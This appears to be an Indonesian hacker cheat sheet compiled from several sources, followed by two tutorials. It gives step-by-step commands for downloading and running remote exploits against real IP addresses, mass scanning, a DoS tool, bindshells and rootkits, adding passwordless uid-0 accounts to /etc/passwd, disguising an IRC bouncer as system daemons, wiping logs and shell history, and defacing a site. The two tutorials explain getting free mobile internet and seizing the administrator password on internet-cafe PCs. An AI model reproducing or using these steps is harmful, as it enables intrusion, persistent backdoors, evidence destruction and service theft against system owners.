http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]#rpm -qa | grep samba

samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36

[root@gila /]# arp -n

Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1

[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios

Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )

[root@gila /]# locate findsmb
/usr/bin/findsmb

[root@router /]# findsmb

IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]

[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication

[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/

[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98

[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================================================================
: BERSIHKAN LOG :
=================================================================================================
ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================
1. wget www.norifumiya.org/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================================================================
1. wget www.juventini-suka.cc/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.buglifeo.org/_Ddos_/vadim.c
2. gcc -o vadim vadim.c
3. ./vadim 202.152.156.189 53 202.152.156.189
=================================================================================================
1. wget http://packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================================================================
1. wget http://cupu.saintz.cx/tools/Baboon/B-BackdoorAsUser/bindshell
2. chmod +x bindshell
3. ./bindshell
4. /run telnet 4000 <– ketik command ini di mirc dikau
/run telnet 203.130.251.91 4000
=================================================================================================
1. wget www.cahcepu.net/dhegleng/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
=================================================================================================
1. wget http://www.anaknaga.com/silverfuck/pl
2. chmod +x pl
3. ./pl
=================================================================================================
1. wget http://www.cahcepu.net/dhegleng/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
=================================================================================================
1. wget www.cahcepu.net/dhegleng/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
=================================================================================================
1. wget http://geocities.com/ondelid/kaka.tar.gz
2. tar zvxf kaka.tar.gz
3. rm kaka.tar.gz ;
4. mv kaka ” ” ;
5. cd ” “
6. PATH=$PATH:/tmp/” “
7. ./kik “adhe” ./psybnc
=================================================================================================
1. wget http://itil.issexy.tv/lx
2. chmod +x lx
3. ./lx
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://packetstormsecurity.nl/exploits/OpenFuckV2.c
2. gcc -o Open OpenFuckV2.c -lcrypto
3. ./Open Target IP
./Open 0×08 196.33.3.4
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
./sambal -d 0 -C 60 -S IP | grep samba
./sambal -b 0 IP <=== attack
=================================================================================================

=================================================================================================
SecureCRT: http://www.vandyke.com/
TTSSH: http://www.zip.com.au/~roca/ttssh.html
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================

=================================================================================================
Install WGET
=================================================================================================
1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.lukyluke.dk/unix/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: COMMAND ADDUSER :
=================================================================================================
/usr/sbin/useradd phaty -g wheel -s /bin/bash -d /etc/phaty
/usr/sbin/useradd geni -u 0 -d /
passwd -d phaty
Changing password for user phaty
Removing password for user phaty
passwd: Success
passwd -d geni
Changing password for user geni
Removing password for user geni
passwd: Success
=================================================================================================
passwd phaty
New UNIX password: lonthe123
Retype new UNIX password: lonthe123
Changing password for user phaty
passwd: all authentication tokens updated successfully
password geni
New UNIX password: koped123
Retype new UNIX password: koped123
Changing password for user geni
passwd: all authentication tokens updated successfully
=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0×15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse

: Opening 30 connections
Establishing SSL connections

-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638

: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…

bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: MARI KITA MAINKAN ROOTNYA :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.norifumiya.org/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1

GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell

*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1

Good Luck d0inks!

mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last |grep mails
su apache
mkdir /var/tmp/” “
cd /var/tmp/” “
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
=================================================================================================

=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
=================================================================================================
Hacking adalah kesungguhan untuk belajar, Hacking adalah “diam” tapi otaknya bekerja, Hacking adalah sebuah proses kebebasan. Seorang hacker adalah seseorang yang ingin mengerti sebuah sistem, mengetahui bagaimana sang sistem bereaksi, bersenang-senang mengambil alih kekuasaan di server tersebut dan tertarik dalam menemukan bugs-bugs. [Kata Mbah scut]
=================================================================================================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd “
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================

: TRIK BIKIN PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir …. ; cd …. ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc “bash ” ; rm psybnc.conf ;
wget http://phaty.org/Psybnc.txt ; mv Psybnc.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/ ; “bash ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir ” ” ; cd ” ” ;
wget http://phaty.org/psyBNC2.2.1-linux-i86-static.tar.gz ;
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make ; mv psybnc “httpd ” ; rm psybnc.conf ;
wget http://www.geocities.com/rush_cassidy/psybnc.txt ; mv psybnc.txt ” ” ; pwd ;
PATH=$PATH:/var/tmp/” “/.log/ ; “httpd ” ” “
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find | grep psybnc
=================================================================================================
: MEMBERSIHKAN LOG :
=================================================================================================
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” “
1. wget www.norifumiya.org/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd phaty -g wheel -s /bin/bash -d /home/phaty
12. echo “geni::0:0::/.geni:/bin/bash” >> /etc/passwd
passwd -d phaty
Changing password for user phaty
Removing password for user phaty
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep phaty
15. su geni
16. wget http//phaty.org/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/phaty
19. wget utay-doyan.cc/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup koped123 7788
23. /usr/sbin/userdel -r phaty
24. cd /var/tmp/” ” index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.htm mnc.htm
echo “Bedjoe Oemar Said Was Here” > index.shtml
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
=================================================================================================
BACKDOOR
=================================================================================================
wget http://xvak-1.150m.com/tool/tk8.tgz
wget http://xvak-1.150m.com/tool/bk2.tar.gz
wget utay-doyan.cc/shv4.tar.gz
wget www.radikal.org/backdoor.tar.gz
=================================================================================================
: COMMAND ADDUSER DALAM ROOT :
=================================================================================================
1. /usr/sbin/adduser vadmin -g root -d /var/vadmin
passwd vadmin
2. /usr/sbin/adduser -u 0 -g 0 apache -d /dev/apache
passwd apache
/usr/sbin/adduser mails -d /usr/local/share
passwd mails
3. /usr/sbin/adduser gdm -d /usr/local/gdm ; chown gdm.gdm /usr/local/gdm
passwd gdm
4. /usr/sbin/adduser http -g root -s /bin/bash -d /var/.asl
passwd http
5. /usr/sbin/adduser apache -m -d /.apache
passwd apache
6. echo “samba:0:0::/.apache:/bin/bash” >> /etc/passwd
7. echo “mail::0:0::/.mail:/bin/csh” >> /etc/passwd
8. echo “mail::0:0:::” >> /etc/passwd
9. echo “mail::0:0:::” >> /etc/shadow
10. echo “root:x:1001:10::/:/bin/bash” >> /etc/passwd
=================================================================================================
: COMMAND DELUSER DALAM ROOT :
=================================================================================================
1. cd /usr/sbin
userdel namauser
2. /usr/sbin/userdel namauser
=================================================================================================
: NGE-ROOT SSH LINUX PORT 22 :
=================================================================================================
1. wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
2. tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
3. cd grabbb
4. gcc -o grabbb grabbb.c
5. ./grabbb -a IP -b IP port, Misalnya :
6. ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
=================================================================================================
wget www.suckmyass.org/ssh-scan8.tar.gz
tar ssh-scan8.tar.gz
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH
./r00t 203.20 -d 2 <— scan massal FTP
./r00t 203.20 -d 3 <— scan massal FTP
./r00t 134.7. -d 4
=================================================================================================
: NGE-ROOT UNTUK OS SCO :
=================================================================================================
wget www.renjana.com/sco
./sco IP
=================================================================================================
: PASANG BACKDOOR :
=================================================================================================
1. cd /tmp
2. wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
3. tar -zxvf tk.tgz
4. cd tk
5. ./t0rn meiyer 5000
=================================================================================================

=================================================================================================
mencari folder yang bisa mendownload file
=================================================================================================
find / -perm 777 -type d

koneksi internet via hp nokia 9300i gratis memanfaatkan hotspot
by: Andr3^81
release: 25 September 2008 pk: 12.38 WIB

Lagi-lagi gratis….itu mulu yang ada dibenak saya…tapi saya berhasil nemuin cara berinternet gratis dengan memanfaatkan hp Nokia 9300i.
Saya mencoba teori ini karena lagi bete mencoba wireless access point yang gak berhasil, maklum di tempat saya berada terdapat 9 Hotspot yang terdeteksi di komputer saya dengan menggunakan Wireless LAN. Tapi anehnya teman saya mengakses internet dengan hpnya kok gratis ya…katanya kalo pake Nokia 9300i gak perlu bayar…yang penting ada hotspot aja, Nah untuk menghemat waktu kita langsung aja ya.

yang perlu dipersiapkan antara lain:
1. terdeteksi hotspot internet ditempat kita
2. memiliki nokia 9300i sebagai modemnya (ingat yang 9300i bukan 9300)
3. memiliki bluetooth (palingan harganya sekitar rp 100 ribuanlah hhehehe
4. mempunyai otak yang brilian (syarat tambahan lolz :~) )
5. mempunyai kartu mentari, selain itu saya belum nyoba kartu yang laen

langkah pertama:
1. aktifkan bluetooth anda di pc dan hp nokia 9300i nya.
2. koneksikan hp nokia 9300i ke pc menggunakan bluetooth yang telah aktif tadi
3. setelah hp nokia 9300i terdeteksi pada pc anda, klik link nokia 9300i hingga hp nokia anda merespon password yang diminta oleh pc
4. isi sembarang password misalnya: 1 kemudian enter maka hp nokia anda telah terhubung ke pc.
5. buka internet melalui Nokia 9300i tersebut, setelah terhubung baru ikutin langkah selanjutnya ke pc anda.

langkah kedua:
1. Buka network connection dengan cara
Klik Start> Control Panel> Network Connections
Terlihat ada Ikon Bluetooth DUN Connection (kebetulan saya menggunakan software IVT Bluesoleil v1.6)
2. Isi username: indosatgprs
password: indosat
Dial-Up Number: *99***1# <- (otomatis mendeteksi ini di komputer saya karena saya tdk tau darimana asalnya kode itu, maka ikuti saja)
3. Klik Dial
tunggu sebentar…
setelah registrasi dan password diterima coba buka browser anda
misalnya http://google.co.id jika muncul berarti anda sukses berselancar ria di dunia maya
4. Langkah selanjutnya terserah anda (mau ceting kek, maw download kek)
5. Setelah di cek pulsanya … gak berubah sedikitpun jg…tetap Rp. 55.627,74
NB: kebetulan saya menggunakan kartu Mentari
akses ke internet lumayan lama…maklum gratisan
jika cara diatas tidak berhasil, coba ganti dulu provider ke mentari (bukan ngiklan ya hahahaha )

Sekian dulu tutorial saya semoga bermanfaat.

Keep Going Indonesian Hackers.

Andr3^81
Borneo Hacker Security

Trik Jitu Ampuh Menghadapi Billing Explorer yang mematikan akses bila sedang berinternet
Pada Windows XP Professional
Tutorial By: Andr3^81
Release On: 14:04 at 19 January 2007

Sering kita ke warnet yang banyak mengunci berbagai akses seperti windows explorer tidak bisa dibuka, klik kanan di desktop tidak bisa, klik kanan di folderpun tidak bisa…betapa sedihnyakan…
apalagi bagi saya yang telah terbiasa dengan shortcut windows xp, misalnya membuka windows explorer:
Win +E, membuka run: Win +R, mencari file di dalam harddisk Win +F, yang mana tombol Win terletak antara
tombol Ctrl dan tombol alt. ingin tahu caranya…nih silakan coba…
Sebenarnya cara ini telah lama saya coba dan ternyata berhasil (praktek di komputer sendiri dan beberapa warnet yang menggunakan billing explorer) Mohon maaf kepada pembuat Billing explorer…untuk tidak berpanjang lebar langsung aja ya…

==> Pertama Buka GPEdit.msc dulu
caranya:
C:\Windows\System32\GPEdit.msc Setelah GPEdit.msc terbuka baru buka Registry Tools
caranya:
C:\Windows\System32\regedit.exe <– double Click
— atau —
C:\Windows\regedit.exe Setelah regedit.exe terbuka baru ubah password administrator <– (Ini yang di tunggu2x)
caranya:
C:\Windows\System32\compmgmt.msc Set Password

- Ketik New Password: **********
Confirm Password: **********

Selesai deh!!!!!!!!!!!!!

———————————— Administrator. ————————————-
——————————————- end ——————————————–
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

———————————————————————————————
Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus

————————————— Bonus – Bonus —————————————

Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu
caranya:
- Masuk ke Folder misalnya: C:/Windows/System32
- Trus klik salah satu file dalam folder itu
misalnya: TaskMgr.exe
- Kemudian klik menu File pada Win Explorer
- Run as…
- Klik The following user -> Masukkan passwordnya
Username: Administrator
Password: ********
- Selesai
NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah
kita pelajari di atas.

Contoh lain2nya dibawah ini………..

1. Membuka MSConfig dari Windows Explorer
Caranya:
C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe

2. Membuka Sysedit dari Windows Explorer
Caranya:
C:\Windows\System32\Sysedit.exe

3. Membuka Task Manager
Caranya:
C:\Windows\System32\taskmgr.exe

4. Membuka Services.msc
Caranya:
C:\Windows\System32\services.msc

5. Membuka Disk Management System (Melihat Partisi Harddisk)
Caranya:
C:\Windows\System32\diskmgmt.msc

6. Membuka Computer Management Services
Caranya:
C:\Windows\System32\compmgmt.msc

7. Membuka Shortcut to desktop
Caranya:
C:\Windows\System32\Show Desktop

8. Membuka Defragment
Caranya
C:\Windows\System32\dfrg.msc

————————————— Bonus – Bonus —————————————

Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus – Bonus
———————————————————————————————